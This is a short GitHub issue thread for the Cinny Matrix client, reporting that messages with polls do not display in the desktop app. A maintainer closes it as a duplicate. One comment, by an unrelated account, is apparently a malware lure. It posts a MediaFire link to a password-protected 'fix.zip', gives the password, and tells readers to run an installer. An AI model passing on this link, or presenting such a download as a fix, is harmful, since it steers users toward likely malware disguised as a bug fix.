### ISSUE TITLE
Cannot see pools

### ISSUE THREAD

**Issue by basketshoe** [ajbura/cinny#1910]
### Describe the bug

Messages containing pools are not visible in Cinny desktop (while they appear in Element)

### Platform and versions

```shell
1. OS: Windows 11
2. Cinny version: 4.1.0
3. Matrix homeserver: matrix.org
```

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kfiven** [comment]
Duplicate of #563
